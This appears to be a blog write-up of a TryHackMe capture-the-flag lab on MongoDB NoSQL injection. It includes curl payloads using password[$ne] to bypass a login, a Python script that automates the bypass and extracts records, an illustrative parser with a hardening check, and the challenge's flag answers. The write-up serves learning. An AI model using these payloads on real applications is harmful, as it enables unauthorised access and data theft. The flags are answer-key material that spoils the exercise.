[Day 7] Web Exploitation: Migration Without Security
This task’s learning objective is NoSQL databases, particularly MongoDB. Here’s a cheatsheet from the MongoDB documentation itself that may make our lives easier.
Personally I’m more used to SQL databases, especially PostgreSQL. But this concise passage summarizes it intelligibly:
Similar to relational databases (such as MySQL and MSSQL), MongoDB consists of databases, tables and fields, but with different names, where
- Collections are similar to tables or views in MySQL and MSSQL.
- Documents are similar to rows or records in MySQL and MSSQL.
- Fields are similar to columns in MySQL and MSSQL.
Also, it is useful to briefly look at and compare the query operators between MongoDB and MySQL:
- $and equivalent to AND in MySQL
- $or equivalent to OR in MySQL
- $eq equivalent to = in MySQL
Before exploiting the NoSQL injection, there are MongoDB operators that we need to be familiar with that are heavily used in the injections, which are:
- $eq - matches records that are equal to a certain value
- $ne - matches records that are not equal to a certain value
- $gt - matches records that are greater than a certain value
- $where - matches records based on a JavaScript condition
- $exists - matches records that have a certain field
- $regex - matches records that satisfy certain regular expressions
According to the task, let’s SSH into our box first:
$ ssh thm@10.10.156.199 -p 2222
thm@10.10.156.199's password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-1059-aws x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
Last login: Tue Dec 21 08:53:12 2021
thm@mongo-server:~$ mongosh
Current Mongosh Log ID: 61c1a96abf06cbd75fee1b76
Connecting to: mongodb://127.0.0.1:27017/?directConnection=true&serverSelectionTimeoutMS=2000
Using MongoDB: 5.0.3
Using Mongosh: 1.1.0
For mongosh info see: https://docs.mongodb.com/mongodb-shell/
------
The server generated these startup warnings when booting:
2021-12-21T08:39:28.330+00:00: Using the XFS filesystem is strongly recommended with the WiredTiger storage engine. See http://dochub.mongodb.org/core/prodnotes-filesystem
2021-12-21T08:39:50.170+00:00: Access control is not enabled for the database. Read and write access to data and configuration is unrestricted
------
Warning: Found ~/.mongorc.js, but not ~/.mongoshrc.js. ~/.mongorc.js will not be loaded.
You may want to copy or rename ~/.mongorc.js to ~/.mongoshrc.js.
test>
As you may have noticed, I used the mongosh shell instead of mongo as the task suggested, since the mongo shell will soon be deprecated and removed.
The next steps are quite obvious if you consult the documentation.
test> show dbs
admin 41 kB
config 36.9 kB
flagdb 41 kB
local 73.7 kB
See that flagdb database? Our first task is to simply query its data.
test> use flagdb
switched to db flagdb
flagdb> show collections
flagColl
flagdb> show tables
flagColl
flagdb> db.flagColl.find()
[
{
_id: ObjectId("618806af0afbc09bdf42bd6a"),
flag: 'THM{8814a5e6662a9763f7df23ee59d944f9}'
}
]
And that’s it for our first task. Onto our second task: inject it.
Here’s what its web interface looks like in a browser:
And if you take a look at DevTools while sending a dummy username and password, you will understand what’s going on behind the scenes:
In short, it sends a POST request in plaintext to /login. So I tried to do it on the command line:
$ curl -X POST -d "username=admin&password=admin" http://10.10.92.86/login
{"msg":"Bad Creds"}
$ curl -X POST -d "username=admin&password[$ne]=admin" http://10.10.92.86/login
{"msg":"Bad Creds"}
Oops, forgot to escape it: inside double quotes the shell expands $ne to an empty string, so the server received password[]=admin and never saw the operator.
$ curl -X POST -d "username=admin&password[\$ne]=admin" http://10.10.92.86/login
Found. Redirecting to /dashboard
It worked!
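To see why password[$ne]=admin gets through while the unescaped version does not, here is an added example (not code from the original post or from the challenge) that mimics the bracket-notation body parsing used by libraries such as qs, which Express’s extended urlencoded parser relies on, builds the filter a naive login handler would hand to MongoDB, and then applies the check a hardened handler should make. The parser is a simplified reimplementation written for this post, not the real library.

```python
#!/usr/bin/env python3
import re
from urllib.parse import parse_qsl

# Matches "head[part1][part2]..." and captures the head and the bracket run.
KEY_RE = re.compile(r"^([^\[\]]+)((?:\[[^\]]*\])*)$")


def parse_body(body: str) -> dict:
    """Simplified qs-style parser: 'a=1&b[c]=2&d[]=3' -> {'a': '1', 'b': {'c': '2'}, 'd': ['3']}."""
    out = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        m = KEY_RE.match(key)
        if not m:
            continue  # ignore keys we cannot interpret
        parts = [m.group(1)] + re.findall(r"\[([^\]]*)\]", m.group(2))
        node = out
        if parts[-1] == "":  # trailing "[]" appends to a list, as qs does
            parts.pop()
            for p in parts[:-1]:
                node = node.setdefault(p, {})
            node.setdefault(parts[-1], []).append(value)
        else:
            for p in parts[:-1]:
                node = node.setdefault(p, {})
            node[parts[-1]] = value
    return out


def build_filter(body: str) -> dict:
    """The filter a naive login handler passes straight to find_one()."""
    form = parse_body(body)
    return {"username": form.get("username"), "password": form.get("password")}


def has_operator(value) -> bool:
    """True if any key anywhere inside value starts with '$' (a MongoDB operator)."""
    if isinstance(value, dict):
        return any(k.startswith("$") or has_operator(v) for k, v in value.items())
    if isinstance(value, list):
        return any(has_operator(v) for v in value)
    return False


def safe_filter(body: str) -> dict:
    """Hardened handler: only plain strings reach the query, so no operator can be smuggled in."""
    form = parse_body(body)
    user, pw = form.get("username"), form.get("password")
    if not isinstance(user, str) or not isinstance(pw, str):
        raise ValueError("username and password must be plain strings")
    return {"username": user, "password": pw}
```

With the injected body, build_filter yields {'password': {'$ne': 'admin'}}, which matches any admin record whose password is not literally "admin"; with the unescaped shell version the password becomes the list ['admin'], which matches nothing.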
The rest of the task is basically doing the same with the [$ne] payload. Therefore, I automated it a bit with a Python script. Enjoy. :D
#!/usr/bin/env python3
import re
import requests

# Normalise the target: ensure a trailing slash and an http(s) scheme.
location = input("Enter server's address (default to http://0.0.0.0/): ") or 'http://0.0.0.0/'
location = location if location.endswith('/') else location + '/'
location = location if location.startswith('http') else 'http://' + location

# Flags look like THM{...}; raw strings avoid invalid-escape-sequence warnings.
FLAG_RE = re.compile(r"(THM\{.+\})")

def login(session):
    # password[$ne]=admin is parsed into {password: {$ne: 'admin'}}, which bypasses the check
    credentials = {'username': 'admin', 'password[$ne]': 'admin'}
    session.post(location + 'login', data=credentials)
    print("Logged in successfully")

def getFlag1(session):
    response = session.get(location + 'flag')
    print("Your first flag is: {}".format(FLAG_RE.search(response.text).group(0)))

def getFlag2(session):
    # username[$ne] matches every user not called 'lmao' (i.e. all of them); role=guest narrows it to guests
    params = {"username[$ne]": "lmao", "role": "guest"}
    response = session.get(location + 'search', params=params)
    print("Your second flag is: {}".format(FLAG_RE.search(response.text).group(0)))

def getFlag3(session):
    # inject both fields to list every record regardless of role
    params = {"username[$ne]": "lmao", "role[$ne]": "lmao"}
    response = session.get(location + 'search', params=params)
    epr = re.compile(r"(ID:[0-9a-z]*:mcskidy:[a-z]*)")
    print("Your last flag is: {}".format(epr.search(response.text).group(0)))

def main():
    session = requests.Session()
    login(session)
    getFlag1(session)
    getFlag2(session)
    getFlag3(session)

if __name__ == '__main__':
    main()
… You can pretty much do the same with BurpSuite, even faster. However, Burp’ll eat up all the RAM and halt this ancient laptop of mine, so no Burp for me. (;-;)
And that’s for today’s challenge!
Interact with the MongoDB server to find the flag. What is the flag?
THM{8814a5e6662a9763f7df23ee59d944f9}
We discussed how to bypass login pages as an admin. Can you log into the application that Grinch Enterprise controls as admin and retrieve the flag?
THM{b6b304f5d5834a4d089b570840b467a8}
Once you are logged in, use the gift search page to list all usernames that have guest roles. What is the flag?
THM{2ec099f2d602cc4968c5267970be1326}
Use the gift search page to perform NoSQL injection and retrieve the mcskidy record. What is the details record?
ID:6184f516ef6da50433f100f4:mcskidy:admin